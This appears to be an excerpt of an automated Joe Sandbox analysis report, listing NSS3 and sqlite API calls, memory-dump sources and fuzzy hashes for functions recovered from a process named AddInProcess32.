                                                                                      • Instruction Fuzzy Hash: CE817271905605AFDB54CF69D940BEAB7F8EF05318F20841DE8299BB40FB31EA45CBA4
                                                                                      APIs
                                                                                        • Part of subcall function 6CCFD87A: PK11_MakeIDFromPubKey.NSS3(00000000,00000000,00000000,?,6CCE41F1,?,?,?,?,?,00000000,00000000,00000000), ref: 6CCFD88F
                                                                                        • Part of subcall function 6CCFD87A: SECITEM_FreeItem_Util.NSS3(00000000,00000001,00000000,00000000,00000000,?,6CCE41F1,?,?,?,?,?,00000000,00000000,00000000), ref: 6CCFD899
                                                                                      • PORT_SetError_Util.NSS3(FFFFE041,?,00000000,00000000), ref: 6CCFBDE0
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,?,00000000,00000000), ref: 6CCFBDEE
                                                                                      • PORT_SetError_Util.NSS3(FFFFE018,?,00000000,00000000), ref: 6CCFBE06
                                                                                      • PK11_IsInternal.NSS3(?,?,00000000,00000000), ref: 6CCFBE19
                                                                                      • PORT_SetError_Util.NSS3(FFFFE08A,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCFBF20
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,FFFFE08A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCFBF28
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,?,?,00000000,?,00000001), ref: 6CCFBFC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$FreeItem_$Error_$K11_$ErrorFromInternalMake
                                                                                      • String ID:
                                                                                      • API String ID: 3256577288-0
                                                                                      • Opcode ID: 6357d19a74fc5235abfb24c95ba40b8b6fe18eb16f872257ad1861ba3080dbdb
                                                                                      • Instruction ID: bc3a5407efea71b0233eed4ca4c75c7b477cbbaa1dca438214d1644331d7c7a4
                                                                                      • Opcode Fuzzy Hash: 6357d19a74fc5235abfb24c95ba40b8b6fe18eb16f872257ad1861ba3080dbdb
                                                                                      • Instruction Fuzzy Hash: 5C619171904204AFDF51DFA4DD80FDE77B8AF05318F2401A9F924A6A90FB31DA568BA1
                                                                                      APIs
                                                                                      • NSS_CMSContentInfo_GetContentTypeTag.NSS3(00000000,?,?,?,?), ref: 6CD29CF4
                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,?), ref: 6CD29D0E
                                                                                      • PORT_ZAlloc_Util.NSS3(0000002C,?,?,?), ref: 6CD29D50
                                                                                      • PORT_ArenaMark_Util.NSS3(?,?,?,?), ref: 6CD29D61
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,00000000,?,?,?,?,?), ref: 6CD29D73
                                                                                      • PT_FPrintStats.NSS3(?,00000000), ref: 6CD29DE9
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,00000000,?,?,?,?,?,?,?), ref: 6CD29DFD
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CD29E05
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_$Content$Free_Info_Mark_PrintRelease_StatsType
                                                                                      • String ID:
                                                                                      • API String ID: 4005923774-0
                                                                                      • Opcode ID: c8b13c7059d1fba3bd1b7d6f63d59950c68e4c0eab3103180f76c08a3434d3dc
                                                                                      • Instruction ID: 5a5545f8c6b1cf99932c7f7d8d239d90e952418e6833918d1ed59946520f796d
                                                                                      • Opcode Fuzzy Hash: c8b13c7059d1fba3bd1b7d6f63d59950c68e4c0eab3103180f76c08a3434d3dc
                                                                                      • Instruction Fuzzy Hash: 8141B271800701AFD7109F39D840B6AB7F4FF4432CF108629E65996FA1EB39D514DB64
                                                                                      APIs
                                                                                      • PK11_FreeSlot.NSS3(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD0AD60
                                                                                      • PORT_SetError_Util.NSS3(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD0AD6E
                                                                                      • PK11_FreeSlot.NSS3(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD0ADAB
                                                                                      • PORT_SetError_Util.NSS3(FFFFE040,?,?,?,?), ref: 6CD0ACD6
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?), ref: 6CD0ACEA
                                                                                      • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CD0ACFA
                                                                                      • PORT_SetError_Util.NSS3(FFFFE00E,00000000,?,?,?,?,?,?,?), ref: 6CD0AD04
                                                                                      • PORT_SetError_Util.NSS3(00000000,?), ref: 6CD0ADC9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_K11_Util$FreeSlot$ErrorImportPublic
                                                                                      • String ID:
                                                                                      • API String ID: 82074194-0
                                                                                      • Opcode ID: 48fed571837abed748abb310595eb16bb465b68f9b0a6ed83eb70bb5576ed933
                                                                                      • Instruction ID: 5db2b6827ba02385670faab29abb0cab48a5a598bca9fe9182365fbe715b6377
                                                                                      • Opcode Fuzzy Hash: 48fed571837abed748abb310595eb16bb465b68f9b0a6ed83eb70bb5576ed933
                                                                                      • Instruction Fuzzy Hash: 0831A072A05508AFDB019F68DC40EDF37A8EF45329F100219F818A6E60EB75DA54C6B6
                                                                                      APIs
                                                                                      • sqlite3_value_bytes.NSS3 ref: 6CC62854
                                                                                      • sqlite3_value_bytes.NSS3(?), ref: 6CC6285E
                                                                                      • sqlite3_value_blob.NSS3(?), ref: 6CC6287E
                                                                                      • sqlite3_value_blob.NSS3(?,?), ref: 6CC6288B
                                                                                      • sqlite3_value_text.NSS3(?), ref: 6CC62898
                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6CC628A5
                                                                                      • memcmp.VCRUNTIME140(00000000,00000000,?), ref: 6CC628CA
                                                                                      • sqlite3_result_int.NSS3(?,00000001), ref: 6CC62907
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_int
                                                                                      • String ID:
                                                                                      • API String ID: 681028010-0
                                                                                      • Opcode ID: 1d208de7f43750bc6d615b689f1d5c9cfb0e6eb88f549b34a579952736792b1e
                                                                                      • Instruction ID: f27deaae05604b56fc78a0a049d58db0733780900d374f51a21327c698be243a
                                                                                      • Opcode Fuzzy Hash: 1d208de7f43750bc6d615b689f1d5c9cfb0e6eb88f549b34a579952736792b1e
                                                                                      • Instruction Fuzzy Hash: F731E172A042099FDB008F6ACED4AADB7F1FF48318B20446AE86597F50EB32DD15DB50
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,?,?,?,6CD2BE6E,?,00000000,00000000,?), ref: 6CD2C860
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                        • Part of subcall function 6CD2BD94: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,6CD2C559,00000000,?,00000000,00000000,-0000001A,-0000001A,?,6CD2A8D2), ref: 6CD2BDA9
                                                                                        • Part of subcall function 6CD2BD94: PORT_ArenaZAlloc_Util.NSS3(00000000,00000018,00000000,?,00000000,00000000,?,6CD2C559,00000000,?,00000000,00000000,-0000001A,-0000001A,?,6CD2A8D2), ref: 6CD2BDB4
                                                                                        • Part of subcall function 6CD2BD94: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000000,00000000,?,00000000,00000000,-0000001A,-0000001A,?,6CD2A8D2), ref: 6CD2BDC9
                                                                                        • Part of subcall function 6CD2BD94: PT_FPrintStats.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,-0000001A), ref: 6CD2BDFF
                                                                                      • PORT_ArenaMark_Util.NSS3(?,?,?,?,?,6CD2BE6E,?,00000000,00000000,?), ref: 6CD2C876
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CD2BE6E,?,00000000,00000000,?), ref: 6CD2C887
                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,0000000C,?,?,?,?,6CD2BE6E,?,00000000,00000000,?), ref: 6CD2C893
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,00000000,?), ref: 6CD2C8BB
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,00000000,00000000,?), ref: 6CD2C8CF
                                                                                      • PT_FPrintStats.NSS3(?,00000000,?,00000000,00000000,?), ref: 6CD2C8FA
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,00000000,?,00000000,00000000,?), ref: 6CD2C91E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_$Error_Mark_PrintStats$AlgorithmCopyErrorItem_Release_
                                                                                      • String ID:
                                                                                      • API String ID: 3570710415-0
                                                                                      • Opcode ID: 83c6826181248f612d0d38337cdf8a9259ff812984c34b32be644865bdcb693c
                                                                                      • Instruction ID: 6518260dd4f05c8f89e04b0eefa5d9fd1a4ace02e8a7b9a7711fcfedcebe9e00
                                                                                      • Opcode Fuzzy Hash: 83c6826181248f612d0d38337cdf8a9259ff812984c34b32be644865bdcb693c
                                                                                      • Instruction Fuzzy Hash: C221C771108308AFE7116F659C40EAA7BA8EF8536DF104239F75685FB0EB3AD814DB61
                                                                                      APIs
                                                                                      • CERT_FindCertExtension.NSS3(?,00000056,?,00000000,00000000,00000001,?,6CCE61A9,6CCE65DF,?,?,?,?,?,00000000,?), ref: 6CCE1CB2
                                                                                      • CERT_GetImposedNameConstraints.NSS3(?,?,00000000,00000000,00000001,?,6CCE61A9,6CCE65DF,?,?,?,?,?,00000000,?,00000000), ref: 6CCE1CD6
                                                                                        • Part of subcall function 6CCE1EEE: PORT_SetError_Util.NSS3(FFFFE005), ref: 6CCE1EFC
                                                                                      • PORT_ArenaMark_Util.NSS3(6CCE61A9,00000000,00000000,00000001,?,6CCE61A9,6CCE65DF,?,?,?,?,?,00000000,?,00000000), ref: 6CCE1CF5
                                                                                      • PORT_Free_Util.NSS3(6CCE61A9,6CCE61A9,?,6CCE61A9,00000000,00000000,00000001,?,6CCE61A9,6CCE65DF,?,?,?,?,?,00000000), ref: 6CCE1D16
                                                                                      • PORT_ArenaRelease_Util.NSS3(6CCE61A9,00000000,?,?,?,?,00000000,00000000,00000001,?,6CCE61A9,6CCE65DF), ref: 6CCE1D25
                                                                                      • PT_FPrintStats.NSS3(6CCE61A9,00000000,?,?,?,?,00000000,00000000,00000001,?,6CCE61A9,6CCE65DF), ref: 6CCE1D2C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$CertConstraintsError_ExtensionFindFree_ImposedMark_NamePrintRelease_Stats
                                                                                      • String ID:
                                                                                      • API String ID: 2755784940-0
                                                                                      • Opcode ID: b0c9f97cded6fbaf9df58d74e2a89f8922775b19ee7c298ed040ce420c45a1c3
                                                                                      • Instruction ID: 704edf578261a59801176c32c5ca659c037509a067b30c419a8349dc9d39542c
                                                                                      • Opcode Fuzzy Hash: b0c9f97cded6fbaf9df58d74e2a89f8922775b19ee7c298ed040ce420c45a1c3
                                                                                      • Instruction Fuzzy Hash: D911EE73D042196BC711ABB85C819EE73ECDF4A568B100276FD10D7A91FB31D91583E1
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(?,00000000,00000000,00000000,?,6CCE328A,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C9C3
                                                                                      • PL_ClearArenaPool.NSS3(?,00000000,00000000,00000000,00000000,?,6CCE328A,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C9D3
                                                                                      • PR_CallOnce.NSS3(6CD89C38,6CD1CC87,00000000,00000000,00000000,?,6CCE328A,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C9E4
                                                                                      • PL_FreeArenaPool.NSS3(?,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1C9F6
                                                                                      • PL_FreeArenaPool.NSS3(?,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1C9FD
                                                                                      • PORT_ZFree_Util.NSS3(?,0000001C,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216), ref: 6CD1CA05
                                                                                      • PR_Unlock.NSS3(00000000,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA11
                                                                                      • PR_DestroyLock.NSS3(00000000,?,00000000,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?,?), ref: 6CD1CA18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArenaPool$FreeLock$CallClearDestroyFree_OnceUnlockUtil
                                                                                      • String ID:
                                                                                      • API String ID: 3997969611-0
                                                                                      • Opcode ID: ec20d11c179f4a836de27f33b51f9247baa86b873ec8770329c65ed534130341
                                                                                      • Instruction ID: 028d6aff1235fa3bc94ed8a98eff024490a7bd870baf5f37723eb5eea4eb8c3e
                                                                                      • Opcode Fuzzy Hash: ec20d11c179f4a836de27f33b51f9247baa86b873ec8770329c65ed534130341
                                                                                      • Instruction Fuzzy Hash: 9A01283314E624AFF7116764B885BAA73ECDB82B79F34001BF24505C905F35A8418675
                                                                                      APIs
                                                                                      • sqlite3_finalize.NSS3(18468B50,00000000,00000007,00000000,?,6CC7D288,00000000), ref: 6CC6AB07
                                                                                      • sqlite3_finalize.NSS3(6CC7D2C0,00000000,00000007,00000000,?,6CC7D288,00000000), ref: 6CC6AB15
                                                                                        • Part of subcall function 6CC665A7: sqlite3_mutex_enter.NSS3(?), ref: 6CC665D0
                                                                                      • sqlite3_free.NSS3(B70F0C87,00000000,00000007,00000000,?,6CC7D288,00000000), ref: 6CC6AB29
                                                                                      • sqlite3_free.NSS3(5002C083,B70F0C87,00000000,00000007,00000000,?,6CC7D288,00000000), ref: 6CC6AB34
                                                                                      • sqlite3_free.NSS3(E80875FF,5002C083,B70F0C87,00000000,00000007,00000000,?,6CC7D288,00000000), ref: 6CC6AB3F
                                                                                      • sqlite3_free.NSS3(000D1223,E80875FF,5002C083,B70F0C87,00000000,00000007,00000000,?,6CC7D288,00000000), ref: 6CC6AB47
                                                                                      • sqlite3_free.NSS3(C35DE58B,000D1223,E80875FF,5002C083,B70F0C87,00000000,00000007,00000000,?,6CC7D288,00000000), ref: 6CC6AB4F
                                                                                      • sqlite3_free.NSS3(6CC7D288,?,6CC7D288,00000000), ref: 6CC6AB5E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_free$sqlite3_finalize$sqlite3_mutex_enter
                                                                                      • String ID:
                                                                                      • API String ID: 1350393783-0
                                                                                      • Opcode ID: 5f1c5b46fcedcc47f5cc9a93728fe45a84dec459bfabfbd8768bbfd147962b2b
                                                                                      • Instruction ID: 8b311b21e35e65ca6e561d980757cdf032657c25e34f6ff501a7e7169c97137a
                                                                                      • Opcode Fuzzy Hash: 5f1c5b46fcedcc47f5cc9a93728fe45a84dec459bfabfbd8768bbfd147962b2b
                                                                                      • Instruction Fuzzy Hash: 47F0C83A514700AFC7216F72DEC0DCEB7AAEF45758F040469E00A6BD21EB327C198750
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 840bb0cb2bf2c46700d12f9ff709cdfac8731cd3dbcd1de1c5abaab5879e5fdc
                                                                                      • Instruction ID: b74e45fd9aa672db4ca0ed67043288d6fda462e5ecf3df6c369f63a61a478fd7
                                                                                      • Opcode Fuzzy Hash: 840bb0cb2bf2c46700d12f9ff709cdfac8731cd3dbcd1de1c5abaab5879e5fdc
                                                                                      • Instruction Fuzzy Hash: 40B10372900605BFDB41CFA5DD40ADEB7B9FF05328F144159E921ABE90FB32E9068B90
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: __cftof
                                                                                      • String ID: P$recursive aggregate queries not supported
                                                                                      • API String ID: 1622813385-3616652015
                                                                                      • Opcode ID: d30108b75801154680318a61f0ee05f8875820746ad88feb50c4211de2872591
                                                                                      • Instruction ID: 3feb3c7e69c05baaa77374cf66f86de67ad46ce3951e6e2d3e1c88cef60ed933
                                                                                      • Opcode Fuzzy Hash: d30108b75801154680318a61f0ee05f8875820746ad88feb50c4211de2872591
                                                                                      • Instruction Fuzzy Hash: 58A17D71901204AFDB10DFA8CC89BAFBBF4FF08314F108459F919AA751E735AA15DB60
                                                                                      APIs
                                                                                      • PK11_DoesMechanism.NSS3(00000001,00000001), ref: 6CD0FFFF
                                                                                      • PK11_ParamFromIV.NSS3(00000001,00000000), ref: 6CD1006F
                                                                                      • PK11_ExtractKeyValue.NSS3(00000000), ref: 6CD10123
                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6CD1015A
                                                                                      • PORT_SetError_Util.NSS3(FFFFE040), ref: 6CD10176
                                                                                      • PK11_ParamFromIV.NSS3(00000001,00000000), ref: 6CD1018D
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001), ref: 6CD101BA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_$FreeFromParamUtil$DoesError_ExtractItem_MechanismValue
                                                                                      • String ID:
                                                                                      • API String ID: 3378763257-0
                                                                                      • Opcode ID: 1482bbb6945544198ca0fee740b1993164d24ebacbc22f78a24f41a13cc4dda3
                                                                                      • Instruction ID: fae7949c927b7543d00d0c08574818be7bd91704d390d555f34f36ca9cca1d99
                                                                                      • Opcode Fuzzy Hash: 1482bbb6945544198ca0fee740b1993164d24ebacbc22f78a24f41a13cc4dda3
                                                                                      • Instruction Fuzzy Hash: 8A717071A0924AEFDF04DF99E88099E77B4FF08364B14405AF819E7B60D771E9A0CB90
                                                                                      APIs
                                                                                      • CERT_IsCACert.NSS3(00000000,?), ref: 6CCFCE29
                                                                                      • CERT_DupCertificate.NSS3(00000000), ref: 6CCFCE3F
                                                                                      • PK11_IsInternal.NSS3(?), ref: 6CCFCE60
                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CCFCE88
                                                                                      • CERT_DupCertificate.NSS3(00000000), ref: 6CCFCEB6
                                                                                      • PK11_IsInternal.NSS3(00000000), ref: 6CCFCED8
                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CCFCF01
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Certificate$DestroyInternalK11_$Cert
                                                                                      • String ID:
                                                                                      • API String ID: 2926667063-0
                                                                                      • Opcode ID: 88c8ae86ad5ced953ea23792dc55df3a71361b953abda85f68cbca28c9885de2
                                                                                      • Instruction ID: 348548101c11f28d6d36052e21a10a004c2a65f87a696a3c447a28170a4b7d9a
                                                                                      • Opcode Fuzzy Hash: 88c8ae86ad5ced953ea23792dc55df3a71361b953abda85f68cbca28c9885de2
                                                                                      • Instruction Fuzzy Hash: CD41A871E05215ABEB60BF658C80AEF77B89F0531CF11816AE93597E00F734D946CAA1
                                                                                      APIs
                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(6CCCADD5,00000004,00000010,6CCCADD5,6CCCAD56,?,00000000,00000010,00000000,6CCCADD5,00000000), ref: 6CCCAE45
                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000010,00000010), ref: 6CCCAEC5
                                                                                      • memchr.VCRUNTIME140(0123456789abcdef,00000000), ref: 6CCCAED3
                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?), ref: 6CCCAF16
                                                                                      • memchr.VCRUNTIME140(0123456789abcdef,00000000), ref: 6CCCAF24
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
